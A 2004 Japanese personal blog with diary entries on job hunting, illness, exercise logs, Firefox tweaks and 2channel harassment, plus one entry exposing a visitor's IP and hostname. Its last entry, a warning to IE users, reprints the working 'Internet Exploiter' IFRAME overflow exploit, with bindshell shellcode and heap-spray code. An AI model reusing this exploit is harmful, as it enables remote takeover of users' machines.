面接で、 ホリエモンに会えたら、 それだけで応募した価値があるなぁと思って応募してみたのですが、それすら叶わなかったか・・・。
_| ̄|○
会えなくて残念。(つД`)
面白そうな人なので、話をしてみたかったのぉ~。

ま、いいや、次行くべ、次!

これだけ速攻でサクっと落ちると、スッキリですよ。
不採用決定の最短記録です。(爆)
対応の素早さは、さすがにベンチャーですね。(笑)

| | コメント (0) | トラックバック (0)

2004年11月18日 (木曜日)

体力作り日記

腹筋 150回

ここ数日、就職活動関係で、色々とゴニョゴニョと作業をしてて疲れてるので、 走りに行けなかった・・・。(´・ω・`)ショボーン
今日は、もう寝よう。

| | コメント (0) | トラックバック (0)

応募の締切り時間ギリギリに

ぽちっとなと。(^^;

ベンチャーでアレな会社なので、罠っぽいですが、 好奇心には勝てず・・・。(爆)
(高確率で罠でしょうなぁ~。
私のような半不良品は優良会社は相手にしてくれないからなぁ~。(´・ω・`)ショボーン)

まぁ、いいでしょ。
どうせ今の私の状態じゃ、にっちもさっちもいかないわけですから、これくらいの冒険はしなくちゃだわ。(笑)

| | コメント (0) | トラックバック (0)

うちのココログのFirefox対応、一応終了

色々と弄って、Firefoxで見てもどうにか崩れないようになりました。
ちょっと無理やりの感のある方法ですが、今のところは、これで許してちょ。(^^;

Classic MacOS対応の方は、やってません・・・。
ごめんちゃいm( __ __ )m です。

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]昨晩、スタイルシートを弄って超夜更かししたら、寝不足感たっぷり・・・。

9時間

うちのココログのデザインをFirefoxにも対応させようと思って、 昨晩、遅くまで作業してたら、今日は凄く気持ち悪いです・・・。(゚∀。lll)
睡眠の時間をしっかり取っても、寝る時間がずれ込むと、体調に影響するっぽい・・・。

結局、作業は終わらずデザインも中途半端なままだし・・・。(´・ω・`)ショボーン
(CSSよく分からん・・・。(つД`))

ついでに、JavaScriptをONにしないと、ここを見れなくなる嫌がらせ機能を追加しました。
ブラウザーの種類を判別して処理しようという今後の布石という意味もありますが、 主な目的は、
2ちゃんねるから来る厨房監視の為
です。(;´Д`)

| | コメント (0) | トラックバック (0)

2004年11月17日 (水曜日)

あ!

今、履歴書をメンテしてるので、以前にお世話になってた会社のWebサイトを見てみたのですが、
社名が変わってる! Σ(゚д゚lll)ガーン

| | コメント (7) | トラックバック (0)

YahooのIDを取った

久しぶりにリクナビNEXTにログインしようと思ったら、 YahooのIDが必要になってた・・・。_| ̄|○

YahooのIDは、むかーし取ったような記憶がおぼろげにあるのですが、まったく覚えてないので、 新しく取りました。(^^;

Yahooは、こんなところにまで進出してたのね。 Σ(゚д゚lll)
孫氏の侵略作戦恐るべし。(;´Д`)

| | コメント (0) | トラックバック (0)

体力作り日記

Jog 60分
散歩 12分

軽い腹筋 100回

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

10時間

また右肋骨下に少し張りがあってちょっとつらい。
そこから来ると思われる吐き気も多少。
昨日は、少し根を詰めてした作業があったので、それで疲れたか?(弱っ)

| | コメント (0) | トラックバック (0)

2004年11月16日 (火曜日)

アラン・ケイ先生はあまり出てなかった。>日本賞

この間録画した「日本賞」のビデオを見ました。
アラン・ケイ先生、あまり出てなかったですよ。(´・ω・`)ショボーン

でも、アラン・ケイ先生のスピーチで、 ダグラス・エンゲルバートの名前が出てきたりして、 ちょっと( ̄ー ̄)ニヤリ。(^^;

| | コメント (0) | トラックバック (0)

体力作り日記

Jog 35分
散歩 7分

軽い腹筋 計200回

| | コメント (0) | トラックバック (0)

UC関連リンク集をちょっとだけ修正

トキさんの所の掲示板を見たら、兵庫医大のホームページが修正されてるとの情報があったので、 うちのUC関連のリンク集を修正しました。

ついでに、IBD関連のblogを見てまわってみたり。
随分と居ますなぁ~。(つД`)>IBD患者&IBD疑惑患者

大変だにょ~。>皆さん
IBD患者の皆様、頑張って下さい。m(_ _)m

| | コメント (0) | トラックバック (0)

『堀江貴文のカンタン!儲かる会社のつくり方』読了

先日買った
堀江貴文のカンタン!儲かる会社のつくり方
堀江貴文著
を読み終わりました。
すべてに同意出来るような内容ではありませんが、なるほど!と思わせるような事が多く書かれてて、 色々と参考になる良い本でした。
練習で開業計画書を書いた事があるので、読むのにその予備知識が役に立ちましたよ。(^_^)

でも、やっぱり、開業するとなると、相当のパワーが必要なようですね。
UCになる前ならともかく、今の私には、こんなバイタリティは無いなぁ・・・。(´・ω・`)ショボーン

ところで、仕事で使う自分のパソコンは自腹なのね。(^^;>ライブドア

ホリエモン曰く、
「ほとんどの人が趣味と仕事の両方で使っているから、そんなものを会社で購入するのはおかしい。」
とのことです。

まぁ、私の居た某C社もそうでしたが・・・。
でも、ライブドアは、パソコン購入の補助があるし、理由を説明してるので、許せるかな?

某C社の場合、会社にパソコンを買ってもらえる人と、私のように自腹の人の二通りがありましたからねぇ~。
私なんかは、最後は、(家が職場に近いという理由で)自分のプリンターまで持ち込みになったもんな・・・。(^^;;;;;;
(当然、某C社の場合、会社から補助なんて出ません。(T_T))

でも、お仕事マシンが自腹ってのは、良い事もあるよ。
仕事で忙しくしてると、自宅でパソコンなんて触ってる時間は、あまり無いのですよ。
ですので、せっかく自分のマシンを買っても、それを触る時間があまり無いんですよね・・・。(´・ω・`)

普通のマイコンオタは、それでフラストレーションが溜まります。(^^;

しかし、仕事で自分のマシンを使ってると、思う存分触れます♪
自分で買ったマシンで、お仕事して稼いでるわけですから、ちょっとした満足感もあります。

そういう意味では、会社が補助金を出して、仕事用のマシンを自腹にするというのは、良い策かもしれませんね。
自分のマシンなら、大切に使うだろうし。
プログラマーなんてのは、職人ですから、自分の手に馴染んだ自分の道具で作業するのが一番効率が良いですしね。
(当時の私は、マカーだったので、PowerBook5300cを毎日会社に持って行って、それで仕事をしてました。
開発用エディタは、CodeWarriorでした。
組み込み系の開発でしたから、エディタさえ使えればマシンは何でも良かったので、ある意味(マカーには)ラッキーな職場でした。
今みたいにMS-Officeが必需品な時代ではなかったので、ワープロはクラリスワークスだったり。(^^;)

その辺の事まで分かってて、そのような策を取ってるなら、エンジニアの心を鷲掴みだなと。(^^;>ホリエモン
(この本には、会社の費用の面の話しか書かれてませんでしたので、真意は分かりません。
多分、ここまで考えてないか?
やっぱり、この本の文面通り、コの業界は、趣味と仕事が一緒のような奴らばかりだから、 自腹でも良いだろ?みたいな感じ?
まぁ、確かにそうですが・・・。(^^;;;;;;;)

この本読んで、色んな事が分かりました。

さて、どうするかな。(謎)

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

7時間30分

| | コメント (0) | トラックバック (0)

2004年11月15日 (月曜日)

千葉県 中核地域生活支援センターがオープンして1ヶ月


こんな事もしてたんですね。>千葉県

ところで、「中核地域生活支援センター」と「難病相談・支援センター」との関連はどうなってるのだろうか?
業務内容に重複する部分があるような気がするけど・・・。

関連:
Google検索:地域難病治療支援事業 site:chiba.jp
「「「難病相談支援センターについて」」」 (2ch.net)
(↑このスレからの情報によると、難病支援対策の地域格差が広がりつつある模様。)

| | コメント (0) | トラックバック (0)

体力作り日記

Jog 40分
散歩 5分

外はさむーい。(^^;

軽い腹筋 合計400回

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

7時間30分

| | コメント (0) | トラックバック (0)

2004年11月14日 (日曜日)

[睡眠時間のログ]こたつでウツラウツラと

3時間

| | コメント (0) | トラックバック (0)

体力作り日記

軽い腹筋 200回

| | コメント (0) | トラックバック (0)

迷惑メールフォルダーの学習度

私の@nifty迷惑メールフォルダーの学習度は、次のような感じ。

学習度 2612 ポイント
迷惑メール学習通数 897 通
通常メール学習通数 5263 通

これでもかなりのspamがすり抜けてくるので、フィルターの設定を弄って、 ある条件のyahoo方面からのメールを自動でゴミ箱送りにするようにしてみました。

私にyahooドメインのメールを送ると、 spam扱いして見落とす可能性があるので注意。
(見落とさないように注意はしますが・・・。)

| | コメント (0) | トラックバック (0)

某友人と私の差

昨晩、何となくバックトラック法が気になって「Cプログラマのためのアルゴリズムとデータ構造 Part 2」を 引っ張り出してきて、バックトラックの所を読み直し。

うーん、大学時代に読んだ本の内容なんて、ちーとも覚えておらんらしい。(つД`)>私の脳味噌
他の章も読み直さないとイカンような気配だなぁ・・・。(´・ω・`)
(私の持ってる「Cプログラマのためのアルゴリズムとデータ構造 Part 2」 は、絶版のようですが、Part1,2をまとめた「定本 Cプログラマのためのアルゴリズムとデータ構造」が 出てるので、興味のある方は、そちらをご覧下さい。
分かりやすくて良い本なので、オススメですよ。
それから、 同じ本のJava版(サポートページ)もあるみたいです。 Javaプログラマーの人は、そちらが良さそう。)

毎日家でゴロゴロしてるだけなので、退化しまくってる私ですが、
逆に大学時代の同じ研究室の友人で、 当時は、プログラミングがムチャクチャ苦手だった人が、 今では、立派に成長して、.NETやJavaサーブレットを駆使出来るエンジニアになってるようです。

その人は、私とは同じような時期に、第一回目の転職を経験した人で、 その転職後は、歯を食いしばって現場で頑張り続けてます。
逆に、私は、現場を離れ、スキルはどんどん落ちてく一方の人・・・。(ノД`)シクシク

私は、.NETもJavaもまともに分かってないですもんね・・・。
一応気になって関連してる本を買ったりはしてますが、実践で使えるレベルからは程遠いです。
自宅でゴロゴロしてるだけなので、時間はムチャクチャあるのに、全然勉強は進んでないという・・・。(つД`)
しかし、現場で頑張り続けてる友人は、しっかり最新技術を吸収しているという・・・。

大学時代とは、立場が逆転してる模様・・・。

職場の待遇に不満を言いつつも、現場で頑張り続けてる人は、しっかり成長するって事ですね。
逆に、現場から離れた人は、落ちてく一方・・・。(つД`)

私は、きつくなると、現場から逃げちゃうからなぁ・・・。
これが、差のついた原因ですね。

成長したければ、
逃げちゃダメだ!
なんですよねぇ・・・。
逃げなかった人は、ちゃんと得る物があるんですよね・・・。
逃げなかった人は、偉いという事ですよ。
逃げなかった人には、勝てません。

ですので、今の私の現状は、自業自得。
逃げた私が悪いという事で、弁解の余地無し。

いつまで逃げ続けたら、気がすむんだろう・・・。>私
そろそろ、本気で頑張らなくちゃな・・・。

頑張ってる同級生の話を聞くと、色々と考えさせられる今日この頃・・・。
このままじゃダメなのは、分かってはいるのだが・・・。

定本Cプログラマのためのアルゴリズムとデータ構造
近藤嘉雪著

出版社 ソフトバンク
発売日 1998.03
価格  ¥ 2,835(¥ 2,700)
ISBN  4797304952

bk1で詳しく見る オンライン書店bk1

Javaプログラマのためのアルゴリズムとデータ構造
近藤嘉雪著

出版社 ソフトバンクパブリッシング
発売日 2004.03
価格  ¥ 2,835(¥ 2,700)
ISBN  4797326603

bk1で詳しく見る オンライン書店bk1

| | コメント (0) | トラックバック (0)

Firefoxメモ

Firefoxをアンインストールした時は、
C:\Program Files\Mozilla Firefox
のファイルは消去されるが、
C:\Documents and Settings\ユーザ名\Application Data\Mozilla\Firefox\Profiles\
以下のファイルは、残したままにしてくれる模様。
その為、ブックマークなどの情報は残ってる。

古いFirefoxをアンインストール後、 新しいFirefoxをインストールした時は、残ってるブックマーク等の情報を引き継いでくれるみたい。

最近、Windowsのファイル管理の癖が、なんとなく分かってきました。
Macが壊れて、Winをメインで使うようになってから、 前は気にしなかったようなところまで見るようになったからでしょうね。(^^;

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]頭の中どんより

9時間

9時間眠ってもどんより気分。
布団から出ても頭の中に霧がかかったままのような感じで使い物にならない。(´・ω・`)
(`・ω・´)シャキーンとなる良い方法ないかね?

かと言って、エスタロンモカ投与すると、胃腸の調子が最悪になるしなぁ・・・。
(去年のデスマーチの対応の為に買ったエスタロンモカ錠が、まだ沢山余ってる・・・。(^^;)

| | コメント (0) | トラックバック (0)

bk1で注文した本

新ロードス島戦記 4 運命の魔船(角川文庫)
水野良〔著〕

出版社 角川書店
発売日 2004.11
価格  ¥ 540(¥ 514)
ISBN  4044604282

bk1で詳しく見る オンライン書店bk1
藍より青し 14(Jets comics)
文月晃著

出版社 白泉社
発売日 2004.09.29
価格  ¥ 530(¥ 505)
ISBN  4592134443

bk1で詳しく見る オンライン書店bk1
堀江貴文のカンタン!儲かる会社のつくり方
堀江貴文著

出版社 ソフトバンクパブリッシング
発売日 200403下旬
価格  ¥ 1,575(¥ 1,500)
ISBN  4797326948

bk1で詳しく見る オンライン書店bk1

ホリエモンの本は、やねうらおさんが紹介してたので、ちと読んでみようかと思って買ってみました。

「解析魔法少女美咲ちゃんマジカル・オープン!」関連で頂いたbk1ポイントを使って買ったので、 やねうらおさん推薦の本も一緒に買っておかねばという感じ。
まだbk1ポイントは余ってるので、面白ければ、他の2冊も買ってみるかも。(^^;

| | コメント (0) | トラックバック (1)

2004年11月13日 (土曜日)

エンベのお勉強メモ

・マルチプレクサ(MPX: multiplexer)
http://www.cqpub.co.jp/term/multiplexer.htm
http://www.cqpub.co.jp/term/multiplexer1.htm
http://www.wdic.org/index.cgi?do=m&word=%1B%24B%25%5E%25k%25A%25W%25l%25%2F%255%1B%28B&mode=top

・デマルチプレクサ(demultiplexer)
http://www.cqpub.co.jp/term/demultiplexer.htm

・マルチプレクサ/デマルチプレクサ
http://ja.wikipedia.org/wiki/%E3%83%9E%E3%83%AB%E3%83%81%E3%83%97%E3%83%AC%E3%82%AF%E3%82%B5

・FPGAの原理(2入力1出力のマルチプレクサ)
http://www.arch.comp.kyutech.ac.jp/~yama/EXP2/about_FPGA.html

| | コメント (0) | トラックバック (0)

Windows XP Service Pack 2 に10件の深刻な脆弱性

Windows XP Service Pack 2 に10件の深刻な脆弱性(/.J)

という事で、やっぱり、SP2を入れるのは、もうちょっと延期。(;´Д`)

しょうがないので、Webブラウザは、 Mozilla Firefoxを使うという方向で・・・。

| | コメント (0) | トラックバック (0)

体力作り日記

Jog 5分
テニス 60分(地元のテニスコート)

ボールが当たる瞬間にラケットの
グリップエンドを下から上に走らせる
イメージで打つと良い感じ。
特に、バックはこのイメージで打たないとネットにかかりやすい。

手からでなく腰の回転から始動。
でも、回転を付けようと力むとダメ。
なんとなく腰が回ってるかな?程度の感じが丁度良いかも。

背筋(背骨)に注意。(ヒント→イチローのフォーム)

TVでクレメンスのインタビューを見て触発された勢いで、

軽い(浅い)腹筋 400回

これから、毎日続ける予定ですが・・・。
と言うか、続けられたら良いな・・・。(^^;

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]お昼寝

1時間

コタツで寝てました。
私のお腹の上で、コロもお昼寝。
いびきをかいて寝てました。>コロ

| | コメント (0) | トラックバック (0)

Norton AntiVirus 2004のインストールメモ

今まで使ってたやつの使用期限が切れてしまったので、 マイクロソフト Windows セキュリティ アップデート CD 2004年4月に入ってた Norton AntiVirusを昨晩インストールしてみました。
夜中に開始したシステムの完全スキャンが今朝無事に終わってましたので、 やっとインストール完了です。

で、インストール作業で、一箇所躓いたので、メモ。

/*!
インストールした後の最初の起動時に、初期化設定処理が止まったままになる場合は、 LiveUpdateの設定をチェックをする事。
今回は、ISP設定がダイアルアップで接続するように勝手に設定変更されててハマッた・・・。(´・ω・`)ショボーン
*/

そうそう、関連した話で、フィンローダさんのblogの
「バージョンアップは超難関」シリーズ
の話は笑いました。
ホント、大変ですよ。>バージョンアップ

私も、ソフトのインストール&バージョンアップでは苦労するタイプの人なので超共感。(^^;

| | トラックバック (0)

[睡眠時間のログ]

5時間30分

なんか首が痛い。(T_T)

| | コメント (0) | トラックバック (0)

2004年11月12日 (金曜日)

体力作り日記

Jog 5分
テニススクール 85分

バック
人差し指と親指がポイントっぽい。
コントロールを付ける時はバックトスでボールを投げる時のイメージな感じ。

フォア
先週言われた 構えた時に打つ面を地面側に向ける のを意識したら、ボールが安定してきた。

サーブ
インパクトの瞬間をしっかり意識する。

| | コメント (0) | トラックバック (0)

自分の書いたプログラムがメモリ上ではどうなるのか考える習慣が、ある人と、ない人の違い

C++:language&libraries MLの
< 救 > 無限再帰にならないの ?
からの内容が面白かったです。

自分の書いたプログラムがどのようにコンパイル&アセンブルされて、 どのようなマシン語になるか意識してる人なら、すぐに分かる事なんですけどね。

マシン語を意識しない人が増えた昨今では、ちょっと分かり難い問題かもしれないですね。

マシン語って何?な人がウジャウジャ現場に出てる時代なので、ジェネレーションギャップにちうい。(^^;

| | コメント (0) | トラックバック (0)

プロキシ規制をかけたいので確認。

Proxy関連情報
VIA:1.0 cachesv525 (NetCache NetApp/5.3.1R4D7DEBUG2)
X-FORWARDED-FOR:203.136.2.190

IPアドレス 203.136.2.190 
ホスト名 FLA1Acd190.kng.mesh.ad.jp 
IPアドレス
 割当国 ※ 日本 (JP) 
都道府県 神奈川県 
接続回線 xDSL 

うちのサイトを見てくれてるこの方ですけど、私の知り合いですかね?
プロキシ規制をかけたいんだけど、プロキシ経由でこの日記が見れなくなると困る方は、 ご連絡下さい。
考慮します。
(あ、F方面の人は大丈夫です。そちら方面のプロキシはallowな設定にするつもりです。)

サイト内関連記事:助けてよ!>ひろゆきさん@2ch管理人

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

8時間30分

| | コメント (0) | トラックバック (0)

2004年11月11日 (木曜日)

フィッシング詐欺の手法


フィッシング詐欺も随分と手が込んできてるんですね。
hostsファイルを書き換えるとか、専門的な所を狙うようになってきてる。

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]昼寝にしては寝過ぎ(+_+)

4時間30分

| | コメント (0) | トラックバック (0)

Firefox 1.0をダウンロード

そろそろダウンロード祭りも落ち着いて、サーバが空いてる頃かな?という事で、
先程ダウンロードしました。

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

5時間30分

微妙に腹が痛いけど、無理やり起きてみるテスト。

| | コメント (0) | トラックバック (0)

2004年11月10日 (水曜日)

楽すると、後からクル・・・

こんな事を言って喜んでると、 夜に大変な目に合う罠。
昼間の分が、夜に回っただけ・・・。(^^;

| | コメント (2) | トラックバック (0)

体力作り日記

Jog 33分
散歩 15分

朝から一度もトイレ(大)に行かない状態のお腹のまま走れました♪
俺的にはこれはスゴイ事ですよ。ヽ(^A^ )ノ

| | コメント (0) | トラックバック (0)

IT業界の「心の病」の悲惨な実態

アンケートで分かった「心の病」の悲惨な実態
(IT Pro)

うひょー、予想はしてたけど、やっぱり悲惨だ・・・。(つД`)>IT業界

「心の病」になりそうだなぁ~ヤバイなぁ~という段階で、無理するのをやめておくのが吉ですね。
そこで無理すると、心の病どころか、本当に身体も壊すですよ・・・。

私のようになりたくなければ、無理しない事ですね。>ALL
心の病なら、ちゃんと治療すれば回復するけど、私みたいに一生治らない病気になっちゃうと洒落にならんですよ。 。゜(゚´Д`゚)゜。

無理して身体を壊しても、誰も褒めてはくれないし、
誰も助けてくれないです。
自分を守るのは、自分ですね。
会社は、社員を守ってくれないですよ。
(守ってくれるのは、会社でなく労働組合。(^^;
でも、この不況で労働組合と会社のパワーバランスが崩れまくってるからなぁ・・・。(´・ω・`))

IT業界の長時間労働体質は、ホント、どうにかならんのですかね?
長時間労働してる社員をさらに追い詰めるから、こんな事になるし・・・。(つД`)

ちなみに、私、この時点から、いまだに社会復帰出来ておらず・・・。
1年3ヶ月ぐらい仕事してないです・・・。_| ̄|○
(正直、会社という物が怖くなってるのです。
就職の事を考えてる時に頭を過ぎるのは、恐怖心・・・。
何でたいした給料も貰ってない仕事なんかで、トラウマになるぐらい怖い思いをしなきゃならないのか・・・。(つД`))

なんとなくですが、私は、『ペアプログラミング』(遅読なので、まだ読み終わってませんが・・・。(^^;)に、解決のヒントがあるような気がしてます。
心の病になりそうな人が沢山居る職場は、ペアプログラミングを導入してみると良いかも。



関連:
「なぜ繰り返すのか,失敗プロジェクト(IT Pro)」より

| | コメント (0) | トラックバック (0)

助けてよ!>ひろゆきさん@2ch管理人

私の偽者さん頑張り過ぎですよ。(つД`)
おかげで、なんか
物凄い勢いで嫌われてる
みたいですなぁ~。_| ̄|○>私
(これだけ、アレだと、私の通院してる病院の関係者も気づいてるでしょうねぇ~。(T_T)
今後、この影響で、色々と困る事が起きる可能性はあるよね・・・。
まぁ、半分は自分で蒔いた種だから、しょうがないけど・・・。)

体調が良いと思って浮かれてると、こういう罠が用意されてるのか・・・。(つД`)
何かいきなり体調が悪くなりそうな気分。(´・ω・`)ショボーン

2ちゃんねらーは手に負えんよ・・・。
2ちゃんねるでなら、何をしても安全だと思ってやがる。(怒)
うちのサイトを直接荒らしてくれるなら、対応策は色々とあるんだけど、 本人の所に直接来ないで、2ちゃんねるで暴れるんだから、質(たち)が悪い・・・。
本人に直接物を言う勇気の無いヤツにとって超便利な道具になってるよ。>2ちゃんねる

取り敢えず、しかるべきところ話を持ち込んで相談しようかな。
スゲー、ダル~だけどね・・・。
(他にやる事あるので、そんな事に工数をかけたくないのだが・・・。(´・ω・`))

ファイル共有の未来とか気にしてないで、 まずは2ちゃんねるの健全化をお願いしますよ。>ひろゆきさん
少なくとも苦情を受け付ける誠意のある対応部隊を用意してよ!
2ちゃんねるは、大きくなり過ぎましたら、そろそろユーザサポートの義務が発生してくる頃だと思うよ。
苦情受付窓口は必要ですよ。ホントに。

こちらは、2ちゃんねる対応に工数かかり過ぎで泣きそうなのですよ。
助けてよ!
(不審者を洗い出す為の自分のサイトの定期的なログ読みだけでも相当時間を使ってます。)

という事で、トラックバックで2ちゃんねる管理人へ通報しておく。( ̄ー ̄#)

問題のスレ:http://life6.2ch.net/test/read.cgi/body/1094117085/

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

11時間

今朝は、えらくお腹が軽くてビックリ。
腹膜炎の手術の後に麻酔から覚めた時以来の感覚かも。

体調が良くて浮かれ過ぎるととしっぺ返しが怖いので、 ほどほどな感じで喜んでおこう。(笑)

| | コメント (0) | トラックバック (0)

2004年11月 9日 (火曜日)

体力作り日記

Jog 30分

ちょっと膝が重めなので早めに上がり。

| | コメント (0) | トラックバック (0)

こりゃ、注意だわ。>IE使ってる人

セキュリティホールmemoより。

この↓メールに
MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) (fwd)
添付されてるファイルをダウンロードして覗いてみたけど、
<HTML><!--
________________________________________________________________________________

    ,sSSSs,   Ss,       Internet Exploiter v0.1
   SS"  `YS'   '*Ss.    MSIE <IFRAME src=... name="..."> BoF PoC exploit
  iS'            ,SS"   Copyright (C) 2003, 2004 by Berend-Jan Wever.
  YS,  .ss    ,sY"      http://www.edup.tudelft.nl/~bjwever
  `"YSSP"   sSS         <skylined@edup.tudelft.nl>
________________________________________________________________________________

  This program is free software; you can redistribute it and/or modify it under
  the terms of the GNU General Public License version 2, 1991 as published by
  the Free Software Foundation.

  This program is distributed in the hope that it will be useful, but WITHOUT
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
  details.

  A copy of the GNU General Public License can be found at:
    http://www.gnu.org/licenses/gpl.html
  or you can write to:
    Free Software Foundation, Inc.
    59 Temple Place - Suite 330
    Boston, MA  02111-1307
    USA.
-->

  <SCRIPT language="javascript">
    // Win32 MSIE exploit helper script, creates a lot of nopslides to land in
    // and/or use as return address. Thanks to blazde for feedback and idears.

    // Win32 bindshell (port 28876, '\0' free, looping). Thanks to HDM and
    // others for inspiration and borrowed code.
    shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
    // Nopslide will contain these bytes:
    bigblock = unescape("%u0D0D%u0D0D");
    // Heap blocks in IE have 20 dwords as header
    headersize = 20;
    // This is all very 1337 code to create a nopslide that will fit exactly
    // between the the header and the shellcode in the heap blocks we want.
    // The heap blocks are 0x40000 dwords big, I can't be arsed to write good
    // documentation for this.
    slackspace = headersize+shellcode.length
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000) block = block+block+fillblock;
    // And now we can create the heap blocks, we'll create 700 of them to spray
    // enough memory to be sure enough that we've got one at 0x0D0D0D0D
    memory = new Array();
    for (i=0;i<700;i++) memory[i] = block + shellcode;
  </SCRIPT>
  <!--
    The exploit sets eax to 0x0D0D0D0D after which this code gets executed:
    7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
    [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
    7178EC04                      68 847B7071     PUSH    71707B84
    7178EC09                      50              PUSH    EAX
    7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
    Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
    We land inside one of the nopslides and slide on down to the shellcode.
  -->
  <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC